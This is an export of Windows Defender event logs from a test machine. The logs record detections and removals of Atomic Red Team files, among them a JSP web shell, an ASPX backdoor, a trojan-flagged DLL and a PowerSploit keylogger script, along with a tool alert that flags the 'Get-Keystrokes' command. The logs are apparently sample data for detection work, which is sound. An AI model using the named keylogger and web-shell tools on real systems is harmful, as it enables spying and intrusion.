Windows Defender took action against Malware,1563483211.952568,2019-07-19T00:53:31.952568+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Action ( 2 ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1117</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:53:31.905406Z"">
</TimeCreated>
<EventRecordID>105</EventRecordID>
<Correlation ActivityID=""2AD0CF94-C382-4568-A488-1253A4ED0F54"">
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""6068"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:16.697Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147708292</Data>
<Data Name=""Threat Name"">HackTool:JS/Jsprat</Data>
<Data Name=""Severity ID"">4</Data>
<Data Name=""Severity Name"">High</Data>
<Data Name=""Category ID"">34</Data>
<Data Name=""Category Name"">Tool</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=HackTool:JS/Jsprat&amp;threatid=2147708292&amp;enterprise=0</Data>
<Data Name=""Status Code"">3</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">2</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0068)</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">8</Data>
<Data Name=""Type Name"">%%862</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">2</Data>
<Data Name=""Action Name"">%%809</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender took action against Malware,1563483211.905406,2019-07-19T00:53:31.905406+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1117</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:53:31.902610Z"">
</TimeCreated>
<EventRecordID>104</EventRecordID>
<Correlation ActivityID=""2AD0CF94-C382-4568-A488-1253A4ED0F54"">
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""6068"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}</Data>
<Data Name=""Detection Time"">2019-07-18T20:41:40.357Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147726426</Data>
<Data Name=""Threat Name"">Trojan:Win32/Sehyioa.A!cl</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:Win32/Sehyioa.A!cl&amp;threatid=2147726426&amp;enterprise=0</Data>
<Data Name=""Status Code"">3</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">2</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">8</Data>
<Data Name=""Type Name"">%%862</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">2</Data>
<Data Name=""Action Name"">%%809</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender took action against Malware,1563483211.90261,2019-07-19T00:53:31.902610+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Action ( 2 ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1117</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:53:31.900809Z"">
</TimeCreated>
<EventRecordID>103</EventRecordID>
<Correlation ActivityID=""2AD0CF94-C382-4568-A488-1253A4ED0F54"">
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""6068"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:18.385Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147683177</Data>
<Data Name=""Threat Name"">Backdoor:ASP/Ace.T</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">6</Data>
<Data Name=""Category Name"">Backdoor</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Backdoor:ASP/Ace.T&amp;threatid=2147683177&amp;enterprise=0</Data>
<Data Name=""Status Code"">3</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">2</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">0</Data>
<Data Name=""Type Name"">%%822</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">2</Data>
<Data Name=""Action Name"">%%809</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563483211.900809,2019-07-19T00:53:31.900809+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( High ) , Name ( HackTool:JS/Jsprat ) , Catgeory ( Tool ) , Path ( containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0068) ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1116</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:51:50.798994Z"">
</TimeCreated>
<EventRecordID>102</EventRecordID>
<Correlation ActivityID=""40013F0F-EF76-4940-A8B2-4DE50BE9AAC3"">
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""6068"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{37522D93-EBDD-4A5B-93B6-E984C9E3FD38}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:16.697Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147708292</Data>
<Data Name=""Threat Name"">HackTool:JS/Jsprat</Data>
<Data Name=""Severity ID"">4</Data>
<Data Name=""Severity Name"">High</Data>
<Data Name=""Category ID"">34</Data>
<Data Name=""Category Name"">Tool</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=HackTool:JS/Jsprat&amp;threatid=2147708292&amp;enterprise=0</Data>
<Data Name=""Status Code"">1</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">1</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">containerfile:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp; file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0005); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0037); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0045); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0065); file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\b.jsp-&gt;(SCRIPT0068)</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">8</Data>
<Data Name=""Type Name"">%%862</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">9</Data>
<Data Name=""Action Name"">%%887</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User""></Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Suspicious Command or process found in the log,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,Found a log contain suspicious powershell command ( Get-Keystrokes),1117,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1117</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:51:50.275470Z"">
</TimeCreated>
<EventRecordID>101</EventRecordID>
<Correlation ActivityID=""6E1A750F-42C6-491E-941A-12F6AF57EBD2"">
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""6068"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{511224D4-1EB4-47B9-BC4A-37E21F923FED}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:00.580Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147725349</Data>
<Data Name=""Threat Name"">Trojan:PowerShell/Powersploit.M</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:PowerShell/Powersploit.M&amp;threatid=2147725349&amp;enterprise=0</Data>
<Data Name=""Status Code"">103</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">2</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">0</Data>
<Data Name=""Type Name"">%%822</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">2</Data>
<Data Name=""Action Name"">%%809</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x80508023</Data>
<Data Name=""Error Description"">The program could not find the malware and other potentially unwanted software on this device. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender took action against Malware,1563483110.798994,2019-07-19T00:51:50.798994+04:00,,Threat,Critical,"Windows Defender took action against Malware - details : Severity ( Severe ) , Name ( Trojan:PowerShell/Powersploit.M ) , Action ( 2 ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1 ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( NT AUTHORITY\SYSTEM ) ",1117,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1117</EventID>
<Version>0</Version>
<Level>4</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:51:50.275470Z"">
</TimeCreated>
<EventRecordID>101</EventRecordID>
<Correlation ActivityID=""6E1A750F-42C6-491E-941A-12F6AF57EBD2"">
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""6068"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{511224D4-1EB4-47B9-BC4A-37E21F923FED}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:00.580Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147725349</Data>
<Data Name=""Threat Name"">Trojan:PowerShell/Powersploit.M</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:PowerShell/Powersploit.M&amp;threatid=2147725349&amp;enterprise=0</Data>
<Data Name=""Status Code"">103</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">2</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1056\Get-Keystrokes.ps1</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">0</Data>
<Data Name=""Type Name"">%%822</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">2</Data>
<Data Name=""Action Name"">%%809</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x80508023</Data>
<Data Name=""Error Description"">The program could not find the malware and other potentially unwanted software on this device. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User"">NT AUTHORITY\SYSTEM</Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482515.198914,2019-07-19T00:41:55.198914+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Trojan:Win32/Sehyioa.A!cl ) , Catgeory ( Trojan ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1116</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:41:48.236136Z"">
</TimeCreated>
<EventRecordID>95</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""5500"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{F6272F78-9FD1-47D2-B206-89E0F0DCBDB9}</Data>
<Data Name=""Detection Time"">2019-07-18T20:41:40.357Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147726426</Data>
<Data Name=""Threat Name"">Trojan:Win32/Sehyioa.A!cl</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">8</Data>
<Data Name=""Category Name"">Trojan</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Trojan:Win32/Sehyioa.A!cl&amp;threatid=2147726426&amp;enterprise=0</Data>
<Data Name=""Status Code"">1</Data>
<Data Name=""Status Description""></Data>
<Data Name=""State"">1</Data>
<Data Name=""Source ID"">3</Data>
<Data Name=""Source Name"">%%818</Data>
<Data Name=""Process Name"">C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe</Data>
<Data Name=""Detection User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Unused3""></Data>
<Data Name=""Path"">file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1218\src\Win32\T1218-2.dll</Data>
<Data Name=""Origin ID"">1</Data>
<Data Name=""Origin Name"">%%845</Data>
<Data Name=""Execution ID"">1</Data>
<Data Name=""Execution Name"">%%813</Data>
<Data Name=""Type ID"">8</Data>
<Data Name=""Type Name"">%%862</Data>
<Data Name=""Pre Execution Status"">0</Data>
<Data Name=""Action ID"">9</Data>
<Data Name=""Action Name"">%%887</Data>
<Data Name=""Unused4""></Data>
<Data Name=""Error Code"">0x00000000</Data>
<Data Name=""Error Description"">The operation completed successfully. </Data>
<Data Name=""Unused5""></Data>
<Data Name=""Post Clean Status"">0</Data>
<Data Name=""Additional Actions ID"">0</Data>
<Data Name=""Additional Actions String"">No additional actions required</Data>
<Data Name=""Remediation User""></Data>
<Data Name=""Unused6""></Data>
<Data Name=""Signature Version"">AV: 1.297.1333.0, AS: 1.297.1333.0, NIS: 0.0.0.0</Data>
<Data Name=""Engine Version"">AM: 1.1.16100.4, NIS: 0.0.0.0</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Windows Defender/Operational
Windows Defender Found Malware,1563482477.632054,2019-07-19T00:41:17.632054+04:00,,Threat,Critical,"Windows Defender Found Malware - details : Severity ( Severe ) , Name ( Backdoor:ASP/Ace.T ) , Catgeory ( Backdoor ) , Path ( file:_C:\AtomicRedTeam\atomic-red-team-master\atomics\T1100\shells\cmd.aspx ) , Process Name ( C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe ) , User ( ) ",1116,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Windows Defender"" Guid=""11CD958A-C507-4EF3-B3F2-5FD9DFBD2C78"">
</Provider>
<EventID>1116</EventID>
<Version>0</Version>
<Level>3</Level>
<Task>0</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-18T20:41:17.508276Z"">
</TimeCreated>
<EventRecordID>76</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""6024"" ThreadID=""5500"">
</Execution>
<Channel>Microsoft-Windows-Windows Defender/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""Product Name"">%%827</Data>
<Data Name=""Product Version"">4.18.1906.3</Data>
<Data Name=""Detection ID"">{CEF4D8DA-15D6-4667-8E4C-12D19AB4EFED}</Data>
<Data Name=""Detection Time"">2019-07-18T20:40:18.385Z</Data>
<Data Name=""Unused""></Data>
<Data Name=""Unused2""></Data>
<Data Name=""Threat ID"">2147683177</Data>
<Data Name=""Threat Name"">Backdoor:ASP/Ace.T</Data>
<Data Name=""Severity ID"">5</Data>
<Data Name=""Severity Name"">Severe</Data>
<Data Name=""Category ID"">6</Data>
<Data Name=""Category Name"">Backdoor</Data>
<Data Name=""FWLink"">https://go.microsoft.com/fwlink/?linkid=37020&amp;name=Backdoor:ASP/Ace.T&amp;threatid=2147683177&amp;enterprise=0</Data>
<Data Name=""Status Code"">1</Data>
<Data Name=""Status Description""></Data>
